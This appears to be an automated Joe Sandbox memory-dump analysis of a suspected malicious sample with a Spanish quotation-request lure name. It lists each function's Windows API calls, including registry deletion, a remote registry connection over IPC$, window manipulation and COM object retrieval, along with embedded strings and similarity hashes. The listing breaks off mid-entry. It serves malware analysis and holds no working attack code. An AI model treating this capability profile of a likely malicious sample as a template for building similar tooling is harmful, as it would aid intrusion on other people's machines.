Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
String ID: (
API String ID: 2598888154-3887548279
Opcode ID: 73026630eacdf47b7fd29de9539ebb068ebedd90fb41d91181253ad1693d0acb
Instruction ID: e49b6aa1cf289d6ad71710b5c69f9238c01f666466ab418f776b38e0d6e6959c
Opcode Fuzzy Hash: 73026630eacdf47b7fd29de9539ebb068ebedd90fb41d91181253ad1693d0acb
Instruction Fuzzy Hash: 6F610675D10219EFCF04DFA4D884AAEBBF5FF48310F20852AE959A7250E770A951CF60

Function 0023DA5D Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 0023DAA1

Part of subcall function 0023D63C: _free.LIBCMT ref: 0023D659
Part of subcall function 0023D63C: _free.LIBCMT ref: 0023D66B
Part of subcall function 0023D63C: _free.LIBCMT ref: 0023D67D
Part of subcall function 0023D63C: _free.LIBCMT ref: 0023D68F
Part of subcall function 0023D63C: _free.LIBCMT ref: 0023D6A1
Part of subcall function 0023D63C: _free.LIBCMT ref: 0023D6B3
Part of subcall function 0023D63C: _free.LIBCMT ref: 0023D6C5
Part of subcall function 0023D63C: _free.LIBCMT ref: 0023D6D7
Part of subcall function 0023D63C: _free.LIBCMT ref: 0023D6E9
Part of subcall function 0023D63C: _free.LIBCMT ref: 0023D6FB
Part of subcall function 0023D63C: _free.LIBCMT ref: 0023D70D
Part of subcall function 0023D63C: _free.LIBCMT ref: 0023D71F
Part of subcall function 0023D63C: _free.LIBCMT ref: 0023D731

_free.LIBCMT ref: 0023DA96

Part of subcall function 002329C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0023D7D1,00000000,00000000,00000000,00000000,?,0023D7F8,00000000,00000007,00000000,?,0023DBF5,00000000), ref: 002329DE
Part of subcall function 002329C8: GetLastError.KERNEL32(00000000,?,0023D7D1,00000000,00000000,00000000,00000000,?,0023D7F8,00000000,00000007,00000000,?,0023DBF5,00000000,00000000), ref: 002329F0

_free.LIBCMT ref: 0023DAB8
_free.LIBCMT ref: 0023DACD
_free.LIBCMT ref: 0023DAD8
_free.LIBCMT ref: 0023DAFA
_free.LIBCMT ref: 0023DB0D
_free.LIBCMT ref: 0023DB1B
_free.LIBCMT ref: 0023DB26
_free.LIBCMT ref: 0023DB5E
_free.LIBCMT ref: 0023DB65
_free.LIBCMT ref: 0023DB82
_free.LIBCMT ref: 0023DB9A

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: beeb216cd925decf9d5cf4296adac85a2abb62a7303024588a01fb29d0314558
Instruction ID: 055490cfbab14a94bf0009e45f620a94370ec595c82ce414ac804786e65ee05c
Opcode Fuzzy Hash: beeb216cd925decf9d5cf4296adac85a2abb62a7303024588a01fb29d0314558
Instruction Fuzzy Hash: 90315AB1664206DFEB22AE39F845B5AB7E9FF00310F25545AE458D7191DE31EC648B20

Function 0026365B Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 267windowtimeCOMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000100), ref: 0026369C
_wcslen.LIBCMT ref: 002636A7
SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00263797
GetClassNameW.USER32(?,?,00000400), ref: 0026380C
GetDlgCtrlID.USER32(?), ref: 0026385D
GetWindowRect.USER32(?,?), ref: 00263882
GetParent.USER32(?), ref: 002638A0
ScreenToClient.USER32(00000000), ref: 002638A7
GetClassNameW.USER32(?,?,00000100), ref: 00263921
GetWindowTextW.USER32(?,?,00000400), ref: 0026395D

Strings

%s%u, xrefs: 00263734

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout_wcslen
String ID: %s%u
API String ID: 4010501982-679674701
Opcode ID: 367b9a853da9ea122e2933490ed5e936554f67e7b35842b86574dffc046e3170
Instruction ID: 2dc8ae45c62d9f4e2366540a111dc616839308e104bed954cadf3f55bba6d078
Opcode Fuzzy Hash: 367b9a853da9ea122e2933490ed5e936554f67e7b35842b86574dffc046e3170
Instruction Fuzzy Hash: 7091B171214607AFD719DF64C885BEAF7A8FF44350F108629F99AC2190DB30EAA5CF91

Function 00264954 Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 253COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000400), ref: 00264994
GetWindowTextW.USER32(?,?,00000400), ref: 002649DA
_wcslen.LIBCMT ref: 002649EB
CharUpperBuffW.USER32(?,00000000), ref: 002649F7
_wcsstr.LIBVCRUNTIME ref: 00264A2C
GetClassNameW.USER32(00000018,?,00000400), ref: 00264A64
GetWindowTextW.USER32(?,?,00000400), ref: 00264A9D
GetClassNameW.USER32(00000018,?,00000400), ref: 00264AE6
GetClassNameW.USER32(?,?,00000400), ref: 00264B20
GetWindowRect.USER32(?,?), ref: 00264B8B

Strings

ThumbnailClass, xrefs: 00264A6F, 00264AF1

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen_wcsstr
String ID: ThumbnailClass
API String ID: 1311036022-1241985126
Opcode ID: cd12908321d89152734300480c8470640807af8b30aa1cf92de53d703238cb68
Instruction ID: f299d5ad3d9aa67e83d8b3517cf6a1dac8cb94d747900e3b54727eb9c2cac367
Opcode Fuzzy Hash: cd12908321d89152734300480c8470640807af8b30aa1cf92de53d703238cb68
Instruction Fuzzy Hash: DD91D131424206AFDB04EF54D885FAA77E8FF84304F04846AFDC59A196DB30EDA5CBA1

Function 00298D0E Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 221windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00219BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00219BB2

PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00298D5A
GetFocus.USER32 ref: 00298D6A
GetDlgCtrlID.USER32(00000000), ref: 00298D75
DefDlgProcW.USER32(?,00000111,?,?,00000000,?,?,?,?,?,?,?), ref: 00298E1D
GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 00298ECF
GetMenuItemCount.USER32(?), ref: 00298EEC
GetMenuItemID.USER32(?,00000000), ref: 00298EFC
GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 00298F2E
GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 00298F70
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00298FA1

Strings

0, xrefs: 00298E9F

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow
String ID: 0
API String ID: 1026556194-4108050209
Opcode ID: 6e8879a7b784369ab2849e1d03824b59275ff118f0f90a3de1fa6ca0065a299d
Instruction ID: c26ba8a78b6fe0146e19808145f848efec0742b003f19d6953d2d016ccb7459f
Opcode Fuzzy Hash: 6e8879a7b784369ab2849e1d03824b59275ff118f0f90a3de1fa6ca0065a299d
Instruction Fuzzy Hash: B181A271528302AFDB10CF24D888AAB77E9FF8A754F18051EF99597291DB70D920CB62

Function 0026DC0E Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 178COMMON

Download Yara Rule

APIs

GetFileVersionInfoSizeW.VERSION(?,?), ref: 0026DC20
GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 0026DC46
_wcslen.LIBCMT ref: 0026DC50
_wcsstr.LIBVCRUNTIME ref: 0026DCA0
VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 0026DCBC

Strings

04090000, xrefs: 0026DCF2
StringFileInfo\, xrefs: 0026DC8F
DefaultLangCodepage, xrefs: 0026DD1F
%u.%u.%u.%u, xrefs: 0026DD9A
\VarFileInfo\Translation, xrefs: 0026DCB4

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: FileInfoVersion$QuerySizeValue_wcslen_wcsstr
String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
API String ID: 1939486746-1459072770
Opcode ID: 99e7ee3599b2930aff2938fa2972ff393edd7ca3c54c0a0d38bed7a70e7e99e6
Instruction ID: a433a5b075c061e6d1d9cdc1fe797fcbe7b35b89b1521e68ccf62f5be7a23e12
Opcode Fuzzy Hash: 99e7ee3599b2930aff2938fa2972ff393edd7ca3c54c0a0d38bed7a70e7e99e6
Instruction Fuzzy Hash: 1F412B32A642197BDB14BBB4EC47EFF77ACDF56710F100169F900A6182EB7099708BA4

Function 0028CC34 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 104registryCOMMON

Download Yara Rule

APIs

RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 0028CC64
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000), ref: 0028CC8D
FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 0028CD48

Part of subcall function 0028CC34: RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 0028CCAA
Part of subcall function 0028CC34: LoadLibraryA.KERNEL32(advapi32.dll,?,?,00000000), ref: 0028CCBD
Part of subcall function 0028CC34: GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 0028CCCF
Part of subcall function 0028CC34: FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 0028CD05
Part of subcall function 0028CC34: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 0028CD28

RegDeleteKeyW.ADVAPI32(?,?), ref: 0028CCF3

Strings

advapi32.dll, xrefs: 0028CCB8
RegDeleteKeyExW, xrefs: 0028CCC9

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: Library$EnumFree$AddressCloseDeleteLoadOpenProc
String ID: RegDeleteKeyExW$advapi32.dll
API String ID: 2734957052-4033151799
Opcode ID: f9eec2ec5fdd4194c75ef4b29ce49bedcb5b3339fcce21040cdb7b9d9a01ca38
Instruction ID: fa8ba2d9aa48b9f4445bbc415032f36c40a7ea98b0990c091e700c62c65c37bb
Opcode Fuzzy Hash: f9eec2ec5fdd4194c75ef4b29ce49bedcb5b3339fcce21040cdb7b9d9a01ca38
Instruction Fuzzy Hash: D3317E75912129BBD720AF55EC88EFFBB7CEF05750F200166A905E3280D7709A459BB0

Function 0026E6B0 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON

Download Yara Rule

APIs

timeGetTime.WINMM ref: 0026E6B4

Part of subcall function 0021E551: timeGetTime.WINMM(?,?,0026E6D4), ref: 0021E555

Sleep.KERNEL32(0000000A), ref: 0026E6E1
EnumThreadWindows.USER32(?,Function_0006E665,00000000), ref: 0026E705
FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 0026E727
SetActiveWindow.USER32 ref: 0026E746
SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 0026E754
SendMessageW.USER32(00000010,00000000,00000000), ref: 0026E773
Sleep.KERNEL32(000000FA), ref: 0026E77E
IsWindow.USER32 ref: 0026E78A
EndDialog.USER32(00000000), ref: 0026E79B

Strings

BUTTON, xrefs: 0026E719

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
String ID: BUTTON
API String ID: 1194449130-3405671355
Opcode ID: 54c9c6eb4e9066e08173f3b42ed7bc9770bf3f332327145d4f9d3c85b3bd4319
Instruction ID: 5a942346356a83bdcda16e3681d2405f26705034edb4755ae94f254e8a76172e
Opcode Fuzzy Hash: 54c9c6eb4e9066e08173f3b42ed7bc9770bf3f332327145d4f9d3c85b3bd4319
Instruction Fuzzy Hash: C721C3B4A10301FFEF025F64FC8DA257B6DFB64348F210427F805821A1DB71AC688B64

Function 0026E9FC Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 71COMMON

Download Yara Rule

APIs

Part of subcall function 00209CB3: _wcslen.LIBCMT ref: 00209CBD

mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 0026EA5D
mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0026EA73
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0026EA84
mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 0026EA96
mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0026EAA7

Strings

open , xrefs: 0026EA0C
alias PlayMe, xrefs: 0026EA36
close PlayMe, xrefs: 0026EA6E, 0026EA9B
play PlayMe wait, xrefs: 0026EA91
status PlayMe mode, xrefs: 0026EA58
play PlayMe, xrefs: 0026EAA2

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: SendString$_wcslen
String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
API String ID: 2420728520-1007645807
Opcode ID: 122cc089a6ecb8bfbe7b4873a8467e2630c5eb5564101b356d59fad0064efd0c
Instruction ID: 23af7a9d2ab9ebe4dcafbdd99319d06df712d03e2a84cda3bdce1b2487a86dc5
Opcode Fuzzy Hash: 122cc089a6ecb8bfbe7b4873a8467e2630c5eb5564101b356d59fad0064efd0c
Instruction Fuzzy Hash: B8117375A7025979DB20E7A5DD4EEFF6A7CEFD2B00F4005297401A20D2EEB04DA5C9B0

Function 00218BCD Relevance: 18.2, APIs: 12, Instructions: 168timeCOMMON

Download Yara Rule

APIs

Part of subcall function 00218F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00218BE8,?,00000000,?,?,?,?,00218BBA,00000000,?), ref: 00218FC5

DestroyWindow.USER32(?), ref: 00218C81
KillTimer.USER32(00000000,?,?,?,?,00218BBA,00000000,?), ref: 00218D1B
DestroyAcceleratorTable.USER32(00000000), ref: 00256973
ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,00000000,?,?,?,?,00218BBA,00000000,?), ref: 002569A1
ImageList_Destroy.COMCTL32(?,?,?,?,?,?,?,00000000,?,?,?,?,00218BBA,00000000,?), ref: 002569B8
ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00218BBA,00000000), ref: 002569D4
DeleteObject.GDI32(00000000), ref: 002569E6

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
String ID:
API String ID: 641708696-0
Opcode ID: 04ed6e7637067afffb6246b830e40e92ba1f909d32c51efd5957512b9e483274
Instruction ID: d6eb9db1da939038816d9e428bedeaa346fddf284cd4c2b94fd39a04bdcedbb2
Opcode Fuzzy Hash: 04ed6e7637067afffb6246b830e40e92ba1f909d32c51efd5957512b9e483274
Instruction Fuzzy Hash: 3A61AD30922601EFDB298F14E99CBA5B7F1FB60312F60451AE44297960CB71ACF4CF94

Function 00219838 Relevance: 18.1, APIs: 12, Instructions: 137COMMON

Download Yara Rule

APIs

Part of subcall function 00219944: GetWindowLongW.USER32(?,000000EB), ref: 00219952

GetSysColor.USER32(0000000F), ref: 00219862

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: ColorLongWindow
String ID:
API String ID: 259745315-0
Opcode ID: 121ddbae2e11e528b0377a2215d425d1d80542dfff4e4d67a09bf387e27743b3
Instruction ID: 44ed04bdf05a0cd0fc05541ab5f23553d9cfed6dd13b1b754889b216d3280791
Opcode Fuzzy Hash: 121ddbae2e11e528b0377a2215d425d1d80542dfff4e4d67a09bf387e27743b3
Instruction Fuzzy Hash: BA41E231115604AFDB205F38AC98BF93BA5FB16331F654606F9A6872E1D7319CE2DB10

Function 002696E2 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 137windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,?,?,0024F7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?), ref: 00269717
LoadStringW.USER32(00000000,?,0024F7F8,00000001), ref: 00269720

Part of subcall function 00209CB3: _wcslen.LIBCMT ref: 00209CBD

GetModuleHandleW.KERNEL32(00000000,00000001,?,00000FFF,?,?,0024F7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?,00000000), ref: 00269742
LoadStringW.USER32(00000000,?,0024F7F8,00000001), ref: 00269745
MessageBoxW.USER32(00000000,00000000,?,00011010), ref: 00269866

Strings

Line %d (File "%s"):, xrefs: 0026978F
%s (%d) : ==> %s: %s %s, xrefs: 0026984A
Error: , xrefs: 0026981D
^ ERROR, xrefs: 002697FB
Line %d:, xrefs: 002697A0

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: HandleLoadModuleString$Message_wcslen
String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
API String ID: 747408836-2268648507
Opcode ID: edc9c78bd5007d4a7a0bf3b8dcb5f5f3c3eb40de8e1c9856d2acdb864dc6412c
Instruction ID: db76490c07261d2d3b7dcf1e3eaa51bc72919821ab71a7dc9a5e920723127a58
Opcode Fuzzy Hash: edc9c78bd5007d4a7a0bf3b8dcb5f5f3c3eb40de8e1c9856d2acdb864dc6412c
Instruction Fuzzy Hash: 28412F72820209AACB14EBE0DD86EEE777CAF55340F500165B606720D3EE356FA8CF61

Function 002606DE Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 127registryshareCOMMON

Download Yara Rule

APIs

Part of subcall function 00206B57: _wcslen.LIBCMT ref: 00206B6A

WNetAddConnection2W.MPR(?,?,?,00000000), ref: 002607A2
RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 002607BE
RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 002607DA
RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00260804
CLSIDFromString.OLE32(?,000001FE,?,SOFTWARE\Classes\), ref: 0026082C
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00260837
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0026083C

Strings

\IPC$, xrefs: 00260784
SOFTWARE\Classes\, xrefs: 0026070E
\CLSID, xrefs: 00260724

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_wcslen
String ID: SOFTWARE\Classes\$\CLSID$\IPC$
API String ID: 323675364-22481851
Opcode ID: ae041debc516c7f70bd9177cfbec16f1b3912b519d0474c0ef2460306a77196f
Instruction ID: 6b9ed930f1853023b56b503a5992d157ed9b65cc3b03e88b3b5aea8769a63d52
Opcode Fuzzy Hash: ae041debc516c7f70bd9177cfbec16f1b3912b519d0474c0ef2460306a77196f
Instruction Fuzzy Hash: 4A41E972D20229ABDF15EFA4DC95DEEB778BF04350F544169E901A31A1EB309E64CFA0

Function 00283C30 Relevance: 16.8, APIs: 11, Instructions: 344fileCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00283C5C
CoInitialize.OLE32(00000000), ref: 00283C8A
CoUninitialize.OLE32 ref: 00283C94
_wcslen.LIBCMT ref: 00283D2D
GetRunningObjectTable.OLE32(00000000,?), ref: 00283DB1
SetErrorMode.KERNEL32(00000001,00000029), ref: 00283ED5
CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,?), ref: 00283F0E
CoGetObject.OLE32(?,00000000,0029FB98,?), ref: 00283F2D
SetErrorMode.KERNEL32(00000000), ref: 00283F40
SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00283FC4
VariantClear.OLEAUT32(?), ref: 00283FD8

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
